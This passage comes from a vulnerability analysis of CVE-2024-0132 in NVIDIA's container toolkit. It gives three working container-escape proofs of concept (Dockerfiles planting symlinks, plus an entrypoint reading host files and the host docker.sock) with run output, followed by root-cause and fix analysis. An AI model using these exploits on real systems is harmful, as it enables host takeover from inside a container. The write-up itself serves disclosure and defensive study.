1. Create the symlink /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999.
2. When the container starts, mount a volume in via the -v flag; the volume contains a symlink /volume/libnvidia-ml.so.999 -> /.
The full PoC:
root@wanglei-gpu:~/poc# ls
Dockerfile  entrypoint.sh  volume
root@wanglei-gpu:~/poc# cat Dockerfile 
FROM ubuntu
RUN apt update && apt install curl -y
WORKDIR /usr/local/cuda/compat
RUN ln -s /volume/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host
RUN ln -s /volume/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run
COPY entrypoint.sh /
# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
ENV NVIDIA_DRIVER_CAPABILITIES=all
CMD /entrypoint.sh
root@wanglei-gpu:~/poc# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc# ls -lah volume/
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec 12 22:09 .
drwxr-xr-x 3 root root 4.0K Dec 12 22:08 ..
lrwxrwxrwx 1 root root    4 Dec 12 22:09 libnvidia-cfg.so.1 -> /run
lrwxrwxrwx 1 root root    1 Dec 12 22:02 libnvidia-ml.so.1 -> /
root@wanglei-gpu:~/poc# docker build -t ssst0n3/poc-cve-2024-0132:volume .
root@wanglei-gpu:~/poc# docker run -ti --runtime=nvidia --gpus=all -v $(pwd)/volume:/volume ssst0n3/poc-cve-2024-0132:volume
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"ad772936a25e694562d7f9f5378b8489981910442be2cd2953e5ca7a0aa022bd","Names":["/great_mayer"],"Image":"ssst0n3/poc-cve-2024-0132:volume","ImageID":"sha256:f416b61ba4d3c81d461f9be06faa60e754577f39fe5ca783dc68ae8ec8dc6b5d","Command":"/bin/sh -c /entrypoint.sh","Created":1734012735,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"3fc07f3e7a9ba4a6ead11fddaf306af818d6994e86cab1783a4134a1b1adb846","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/root/poc/volume","Destination":"/volume","Mode":"","RW":true,"Propagation":"rprivate"}]}]
This exploits the vulnerability, but it requires a mounted volume. The next section uses procfs to achieve exploitation without any volume.
3.3.2 The procfs method
Under the container rootfs, /proc/1 belongs to the runc init process, and /proc/1/cwd points to the container's rootfs.
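The magic-link behavior of /proc/<pid>/cwd can be observed from Python using /proc/self/cwd (a Linux-only sketch; /proc/1/cwd behaves the same way for the init process of the PID namespace):

```python
import os

# /proc/<pid>/cwd is a "magic" symlink maintained by the kernel: it always
# points at that process's current working directory. For the container's
# init process, /proc/1/cwd therefore leads into the container rootfs.
os.chdir("/tmp")
print(os.readlink("/proc/self/cwd"))
```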
1. Create the symlink /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/1/cwd/libnvidia-ml.so.999.
2. Create the symlink /libnvidia-ml.so.999 -> /.
The full PoC follows and achieves a fairly ideal result:
root@wanglei-gpu:~/poc-procfs# cat Dockerfile 
FROM ubuntu
RUN apt update && apt install curl -y
WORKDIR /usr/local/cuda/compat
RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && \
    ln -s / /usr/lib/libnvidia-ml.so.1 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host
RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && \
    ln -s /run /usr/lib64/libnvidia-cfg.so.1 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run
COPY entrypoint.sh /
# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
ENV NVIDIA_DRIVER_CAPABILITIES=all
CMD /entrypoint.sh
root@wanglei-gpu:~/poc-procfs# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-procfs# ls
Dockerfile  entrypoint.sh
root@wanglei-gpu:~/poc-procfs# docker build -t ssst0n3/poc-cve-2024-0132:proc .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/
Sending build context to Docker daemon  3.584kB
Step 1/8 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/8 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 22cff36a341c
Step 3/8 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> d13208243e8f
Step 4/8 : RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 && ln -s / /usr/lib/libnvidia-ml.so.1 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host
 ---> Using cache
 ---> 6371e6b56cab
Step 5/8 : RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 && ln -s /run /usr/lib64/libnvidia-cfg.so.1 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run
 ---> Running in 6d3f1fb775b2
Removing intermediate container 6d3f1fb775b2
 ---> 24cfef3630d3
Step 6/8 : COPY entrypoint.sh /
 ---> 473de3b01d8f
Step 7/8 : ENV NVIDIA_DRIVER_CAPABILITIES=all
 ---> Running in 215739d1c861
Removing intermediate container 215739d1c861
 ---> ab62217ce62b
Step 8/8 : CMD /entrypoint.sh
 ---> Running in 358b01f5a7e5
Removing intermediate container 358b01f5a7e5
 ---> e8b3b6adb292
Successfully built e8b3b6adb292
Successfully tagged ssst0n3/poc-cve-2024-0132:proc
root@wanglei-gpu:~# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132:proc
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"a84e9812921f2a49541982607b0488f3b9bc8bd04ae074c6b65f5546761a1367","Names":["/keen_wu"],"Image":"ssst0n3/poc-cve-2024-0132:proc","ImageID":"sha256:e8b3b6adb292f3732662e09d721b6ae20d52b4e8d3ae54037917d3fcae6d1418","Command":"/bin/sh -c /entrypoint.sh","Created":1734014316,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"bf50a193cce8ba008eb132b957d511300b626e85b0d8e3150d4264a6da75e19d","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
3.3.3 The two-mounts method
1. Create the symlink /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /.
2. Create the symlink /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112.
The full PoC follows; the exploitation result is equally clean:
root@wanglei-gpu:~/poc-2mounts# cat Dockerfile 
FROM ubuntu
RUN apt update && apt install curl -y
WORKDIR /usr/local/cuda/compat
RUN mkdir libnvidia-cfg.so.111 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 && \
    ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 && \
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run
CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-2mounts# docker build -t ssst0n3/poc-cve-2024-0132-ym .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit: https://docs.docker.com/go/buildx/
Sending build context to Docker daemon  3.072kB
Step 1/5 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/5 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 77fb95a6fc52
Step 3/5 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> 311a3960cc5f
Step 4/5 : RUN mkdir libnvidia-cfg.so.111 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 && ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 && ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run
 ---> Using cache
 ---> dcc8fbd93574
Step 5/5 : CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
 ---> Using cache
 ---> fc14d064757d
Successfully built fc14d064757d
Successfully tagged ssst0n3/poc-cve-2024-0132-ym:latest
root@wanglei-gpu:~/poc-2mounts# docker run -ti --rm --runtime nvidia --gpus=all ssst0n3/poc-cve-2024-0132-ym
[{"Id":"d45013b4c5293030f9c01929e81b69d1af0d676a44d230710c8a97baef394758","Names":["/friendly_perlman"],"Image":"ssst0n3/poc-cve-2024-0132-ym","ImageID":"sha256:fc14d064757d9b17bf6454e06fe63af49f17fbd95391158908625142def35c86","Command":"/bin/sh -c 'sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json'","Created":1736862952,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"c4573489d87e5162cf69495fcb6a4bb879c152012853d98d8ab202b0bf13e755","EndpointID":"a73ef57a093f3c18a4d0df8c5bc29f4b3d104e4653ce45a63216b81dc010dec1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
4. Why /proc/self/cwd cannot be exploited
/proc/self is a symlink pointing to /proc/<PID of the current process>.
Entering only the mount namespace switches the filesystem view (including /proc) to the container's view, but the process still lives in the host's PID namespace, so /proc/self cannot be resolved properly.
The problem can be reduced to entering the container's mount namespace with nsenter -m; /proc/self then turns out to be inaccessible.
root@wanglei-gpu:~# docker run -tid ubuntu sleep 7777
70c6ac9b97277217e13fecbc8ac8754e569b83b33a871236493a10b5ad291ca3
root@wanglei-gpu:~# ps -ef |grep 7777
root       30697   30677  0 22:51 pts/0    00:00:00 sleep 7777
root       30720   23331  0 22:51 pts/0    00:00:00 grep --color=auto 7777
root@wanglei-gpu:~# nsenter -t 30697 -m
root@wanglei-gpu:/# ls -lahd proc/1
dr-xr-xr-x 9 root root 0 Dec 12 14:51 proc/1
root@wanglei-gpu:/# ls -lahd proc/self
ls: cannot read symbolic link 'proc/self': No such file or directory
lrwxrwxrwx 1 root root 0 Dec 12 14:51 proc/self
root@wanglei-gpu:/# stat proc/self
  File: proc/self
stat: cannot read symbolic link 'proc/self': No such file or directory
  Size: 0          Blocks: 0          IO Block: 1024   symbolic link
Device: 0,65   Inode: 4026531842  Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.538149127 +0000
Change: 2024-12-12 14:51:50.538149127 +0000
 Birth: -
root@wanglei-gpu:/# stat proc/1
  File: proc/1
  Size: 0          Blocks: 0          IO Block: 1024   directory
Device: 0,65   Inode: 224269  Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.626149745 +0000
Change: 2024-12-12 14:51:50.626149745 +0000
 Birth: -
If the PID namespace is entered at the same time, however, /proc/self becomes accessible, and the parent nsenter process is invisible from inside the container.
root@wanglei-gpu:~# nsenter -t 30697 -m -p
root@wanglei-gpu:/# cat /proc/self/status 
Name:   cat
Umask:  0022
State:  R (running)
Tgid:   53015
Ngid:   0
Pid:    53015
PPid:   52992
...
root@wanglei-gpu:/# cat /proc/52992/status
Name:   bash
Umask:  0022
State:  S (sleeping)
Tgid:   52992
Ngid:   0
Pid:    52992
PPid:   0
...
5. Why CDI mode is not affected
According to section "VII. Vulnerability Analysis - 2.6 nvidia-container-runtime-hook invokes nvidia-container-cli", the CUDA forward compatibility feature is exercised by the nvidia-container-cli configure command.
As described in section "VII. Vulnerability Analysis - 2.4 What nvidia-container-runtime modifies in the spec", CDI mode never invokes nvidia-container-cli configure: all configuration has already been written into the spec, sourced from /etc/cdi/nvidia.yaml, for example:
---
cdiVersion: 0.5.0
containerEdits:
  deviceNodes:
  - path: /dev/nvidia-modeset
  - path: /dev/nvidia-uvm
  - path: /dev/nvidia-uvm-tools
  - path: /dev/nvidiactl
  env:
  - NVIDIA_VISIBLE_DEVICES=void
  hooks:
  - args:
    - nvidia-cdi-hook
    - create-symlinks
    - --link
    - libnvidia-allocator.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-allocator.so.1
    - --link
    - ../libnvidia-allocator.so.1::/usr/lib/x86_64-linux-gnu/gbm/nvidia-drm_gbm.so
    - --link
    - libnvidia-vulkan-producer.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-vulkan-producer.so
    - --link
    - libglxserver_nvidia.so.470.223.02::/usr/lib/xorg/modules/extensions/libglxserver_nvidia.so
    hookName: createContainer
    path: /usr/bin/nvidia-cdi-hook
  - args:
    - nvidia-cdi-hook
    - update-ldcache
    - --folder
    - /usr/lib/x86_64-linux-gnu
    hookName: createContainer
    path: /usr/bin/nvidia-cdi-hook
  mounts:
  - containerPath: /run/nvidia-persistenced/socket
    hostPath: /run/nvidia-persistenced/socket
    options:
    - ro
    - nosuid
    - nodev
    - bind
    - noexec
  ...
  - containerPath: /usr/bin/nvidia-persistenced
    hostPath: /usr/bin/nvidia-persistenced
    options:
    - ro
    - nosuid
    - nodev
    - bind
  - containerPath: /usr/bin/nvidia-smi
    hostPath: /usr/bin/nvidia-smi
    options:
    - ro
    - nosuid
    - nodev
    - bind
  ...
devices:
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: "0"
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: GPU-86fd03a3-2937-0c87-3dff-26be693ec102
- containerEdits:
    deviceNodes:
    - path: /dev/nvidia0
    - path: /dev/dri/card1
    - path: /dev/dri/renderD128
    hooks:
    - args:
      - nvidia-cdi-hook
      - create-symlinks
      - --link
      - ../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      - --link
      - ../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName: createContainer
      path: /usr/bin/nvidia-cdi-hook
    ...
  name: all
kind: nvidia.com/gpu
VIII. How the Vulnerability Was Introduced
commit#35a9f27(https://github.com/NVIDIA/libnvidia-container/commit/35a9f27c0200d74fdccc43f893253439d1b969a5#diff-082d73ee31e0c92eac8fe9324cd6dca676357264ec3d36f934ba718dae93f6d1)
This commit was primarily a feature implementation and overlooked two things:
1. Mounting files from the container back into the container is a sensitive operation.
2. No restrictions were placed on symlinks (hard to anticipate for a developer unfamiliar with container security).
IX. Fix Analysis
1. Analysis of the fix
PR#282
1.1 New function mount_in_root
The mount_in_root function was added: it returns an error if the destination path resolves outside the rootfs.
https://github.com/NVIDIA/libnvidia-container/commit/ad1f8c8ac4a31bef69c82958f3a87456ceaa39c8?diff=unified#diff-ad502ebe98b15d295b76f88ec8ff917a249b05151a3191db41e43f0390c70b2dR69-R77
src/nvc_mount.c
+static char *mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags);
+// mount_in_root bind mounts the specified src to the specified location in a root.
+// If the destination resolves outside of the root an error is raised.
+static char *
+mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) {
+    char dst[PATH_MAX];
+    if (path_resolve_full(err, dst, rootfs, path) < 0)
+        return (NULL);
+    return mount_with_flags(err, src, dst, uid, gid, mountflags);
+}
int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
    return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
    int fd = -1;
    int rv = -1;
    char realpath[PATH_MAX];
    char dbuf[2][PATH_MAX];
    char *link = dbuf[0];
    char *ptr = dbuf[1];
    char *file, *p;
    unsigned int noents = 0;
    unsigned int nlinks = 0;
    ssize_t n;

    *ptr = '\0';
    *realpath = '\0';
    assert(*root == '/');

    if ((fd = open_next(err, -1, root)) < 0)
        goto fail;
    if (path_append(err, ptr, path) < 0)
        goto fail;

    while ((file = strsep(&ptr, "/")) != NULL) {
        if (*file == '\0' || str_equal(file, "."))
            continue;
        else if (str_equal(file, "..")) {
            /*
             * Remove the last component from the resolved path. If we are not below
             * non-existent components, restore the previous file descriptor as well.
             */
            if ((p = strrchr(realpath, '/')) == NULL) {
                error_setx(err, "path error: %s resolves outside of %s", path, root);
                goto fail;
            }
            *p = '\0';
            if (noents > 0)
                --noents;
            else {
                if ((fd = open_next(err, fd, "..")) < 0)
                    goto fail;
            }
        } else {
            if (noents > 0)
                goto missing_ent;
            n = readlinkat(fd, file, link, PATH_MAX);
            if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                /*
                 * Component is a symlink, append the rest of the path to it and
                 * proceed with the resulting buffer. If it is absolute, also clear
                 * the resolved path and reset our file descriptor to root.
                 */
                link[n] = '\0';
                if (*link == '/') {
                    ++link;
                    *realpath = '\0';
                    if ((fd = open_next(err, fd, root)) < 0)
                        goto fail;
                }
                if (ptr != NULL) {
                    if (path_append(err, link, ptr) < 0)
                        goto fail;
                }
                ptr = link;
                link = dbuf[++nlinks % 2];
            } else {
                if (n >= PATH_MAX)
                    errno = ENAMETOOLONG;
                else if (nlinks >= MAXSYMLINKS)
                    errno = ELOOP;
                switch (errno) {
                missing_ent:
                case ENOENT:
                    /* Component doesn't exist */
                    ++noents;
                    if (path_append(err, realpath, file) < 0)
                        goto fail;
                    break;
                case EINVAL:
                    /* Not a symlink, proceed normally */
                    if ((fd = open_next(err, fd, file)) < 0)
                        goto fail;
                    if (path_append(err, realpath, file) < 0)
                        goto fail;
                    break;
                default:
                    error_set(err, "path error: %s/%s", root, path);
                    goto fail;
                }
            }
        }
    }
    if (!full) {
        if (path_new(err, buf, realpath) < 0)
            goto fail;
    } else {
        if (path_join(err, buf, root, realpath) < 0)
            goto fail;
    }
    rv = 0;

 fail:
    xclose(fd);
    return (rv);
}
1.2 Replacing mount_with_flags with mount_in_root
src/nvc_mount.c
 static char *
 mount_directory(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir)
 {
     char src[PATH_MAX];
-    char dst[PATH_MAX];

     if (path_join(err, src, root, dir) < 0)
         return (NULL);
-    if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
-        return (NULL);
-    return mount_with_flags(err, src, dst, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
+    return mount_in_root(err, src, cnt->cfg.rootfs, dir, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
 }

 // mount_firmware mounts the specified firmware file. The path specified is the container path and is resolved
 // on the host before mounting.
 static char *
 mount_firmware(struct error *err, const char *root, const struct nvc_container *cnt, const char *container_path)
 {
     char src[PATH_MAX];
-    char dst[PATH_MAX];

     if (path_resolve_full(err, src, root, container_path) < 0)
         return (NULL);
-    if (path_join(err, dst, cnt->cfg.rootfs, container_path) < 0)
-        return (NULL);
+    return mount_in_root(err, src, cnt->cfg.rootfs, container_path, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID);
 }
1.3 New function file_mode_nofollow
Compared with file_mode, file_mode_nofollow replaces stat with lstat, so that symlinks are not followed.
src/utils.h
+int file_mode_nofollow(struct error *, const char *, mode_t *);
src/utils.c
+// file_mode_nofollow implements the same functionality as file_mode except that
+// in that case of a symlink, the file is not followed and the mode of the
+// original file is returned.
+int
+file_mode_nofollow(struct error *err, const char *path, mode_t *mode)
+{
+    struct stat s;
+
+    if (xlstat(err, path, &s) < 0)
+        return (-1);
+    *mode = s.st_mode;
+    return (0);
+}
src/xfuncs.h
+static inline int xlstat(struct error *, const char *, struct stat *);
...
+static inline int
+xlstat(struct error *err, const char *path, struct stat *buf)
+{
+    int rv;
+
+    if ((rv = lstat(path, buf)) < 0)
+        error_set(err, "lstat failed: %s", path);
+    return (rv);
+}
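The stat-vs-lstat distinction can be illustrated in Python, where os.stat() follows symlinks like stat(2) and os.lstat() inspects the link itself like lstat(2); the file names below are arbitrary:

```python
import os
import stat
import tempfile

d = tempfile.mkdtemp()
target = os.path.join(d, "libfoo.so.1")   # a regular file
link = os.path.join(d, "libfoo.so.999")   # a symlink pointing at it
open(target, "w").close()
os.symlink(target, link)

mode_follow = os.stat(link).st_mode     # like file_mode(): sees the target
mode_nofollow = os.lstat(link).st_mode  # like file_mode_nofollow(): sees the link

print(stat.S_ISREG(mode_follow))    # True  - the target is a regular file
print(stat.S_ISLNK(mode_nofollow))  # True  - the path itself is a symlink
```

With the no-follow variant, mount_files() can now detect that a source path is itself a symlink and refuse to mount it.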
1.4 Replacing file_mode with file_mode_nofollow
 static char **
 mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
 {
     char src[PATH_MAX];
     char dst[PATH_MAX];
     mode_t mode;
     char *src_end, *dst_end, *file;
     char **mnt, **ptr;

     if (path_new(err, src, root) < 0)
         return (NULL);
     if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
         return (NULL);
     if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
         return (NULL);
+    if (path_new(err, dst, dir) < 0)
+        return (NULL);

     src_end = src + strlen(src);
     dst_end = dst + strlen(dst);

     mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
     if (mnt == NULL)
         return (NULL);

     for (size_t i = 0; i < size; ++i) {
         file = basename(paths[i]);
         if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
             continue;
         if (path_append(err, src, paths[i]) < 0)
             goto fail;
-        if (path_append(err, dst, file) < 0)
-            goto fail;
-        if (file_mode(err, src, &mode) < 0)
+        if (file_mode_nofollow(err, src, &mode) < 0)
             goto fail;
-        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
+        // If we encounter resolved directories or symlinks here, we raise an error.
+        if (S_ISDIR(mode) || S_ISLNK(mode)) {
+            error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
             goto fail;
-        log_infof("mounting %s at %s", src, dst);
-        if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
-            goto fail;
-        if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
+        }
+        if (path_append(err, dst, file) < 0)
             goto fail;
-        if ((*ptr++ = xstrdup(err, dst)) == NULL)
+        if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
             goto fail;
         *src_end = '\0';
         *dst_end = '\0';
     }
     return (mnt);

 fail:
     for (size_t i = 0; i < size; ++i)
         unmount(mnt[i]);
     array_free(mnt, size);
     return (NULL);
 }
src/utils.c
 int
 file_create(struct error *err, const char *path, const char *data, uid_t uid, gid_t gid, mode_t mode)
 {
     char *p;
     uid_t euid;
     gid_t egid;
     mode_t perm;
     int fd;
     size_t size;
     int flags = O_NOFOLLOW|O_CREAT;
     int rv = -1;

     // We check whether the file already exists with the required mode and skip the creation.
-    if (data == NULL && file_mode(err, path, &perm) == 0) {
+    if (data == NULL && file_mode_nofollow(err, path, &perm) == 0) {
         if (perm == mode) {
-            log_errf("The path %s already exists with the required mode; skipping create", path);
+            log_warnf("The path %s already exists with the required mode; skipping create", path);
             return (0);
         }
     }

     if ((p = xstrdup(err, path)) == NULL)
         return (-1);
     /*
      * Change the filesystem UID/GID before creating the file to support user namespaces.
      * This is required since Linux 4.8 because the inode needs to be created with a UID/GID known to the VFS.
      */
     euid = geteuid();
     egid = getegid();
     if (set_fsugid(uid, gid) < 0)
         goto fail;

     perm = (0777 & ~get_umask()) | S_IWUSR | S_IXUSR;
     if (make_ancestors(dirname(p), perm) < 0)
         goto fail;
     perm = 0777 & ~get_umask() & mode;

     if (S_ISDIR(mode)) {
         if (mkdir(path, perm) < 0 && errno != EEXIST)
             goto fail;
     } else if (S_ISLNK(mode)) {
         if (data == NULL) {
             errno = EINVAL;
             goto fail;
         }
         if (symlink(data, path) < 0 && errno != EEXIST)
             goto fail;
     } else {
         if (data != NULL) {
             size = strlen(data);
             flags |= O_WRONLY|O_TRUNC;
         }
         if ((fd = open(path, flags, perm)) < 0) {
             if (errno == ELOOP)
                 errno = EEXIST; /* XXX Better error message if the file exists and is a symlink. */
             goto fail;
         }
         if (data != NULL && write(fd, data, size) < (ssize_t)size) {
             close(fd);
             goto fail;
         }
         close(fd);
     }
     rv = 0;

 fail:
     if (rv < 0)
         error_set(err, "file creation failed: %s", path);
     assert_func(set_fsugid(euid, egid));
     free(p);
     return (rv);
 }
2. Verifying the fix
2.1 Reproduction environment
The environment is the same as in "VI. Reproducing the Vulnerability - 1. nvidia-container-toolkit - 1.1 Reproduction environment".
Install docker and nvidia-container-toolkit:
root@wanglei-gpu:~# apt update && apt install docker.io -y
root@wanglei-gpu:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu:~# apt-get update && \
    apt-get install -y libnvidia-container1=1.16.2-1 \
      libnvidia-container-tools=1.16.2-1 \
      nvidia-container-toolkit-base=1.16.2-1 \
      nvidia-container-toolkit=1.16.2-1
Configure the nvidia container runtime:
root@wanglei-gpu:~# nvidia-ctk runtime configure --runtime=docker
INFO[0000] Config file does not exist; using empty config 
INFO[0000] Wrote updated config to /etc/docker/daemon.json 
INFO[0000] It is recommended that docker daemon be restarted. 
root@wanglei-gpu:~# systemctl restart docker
The environment information is as follows:
root@wanglei-gpu:~# nvidia-container-cli --version
cli-version: 1.16.2
lib-version: 1.16.2
build date: 2024-09-24T20:48+00:00
build revision: 921e2f3197385173cf8670342e96e98afe9b3dd3
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu:~# 
root@wanglei-gpu:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4
Device Index:   0
Device Minor:   0
Model:          Tesla T4
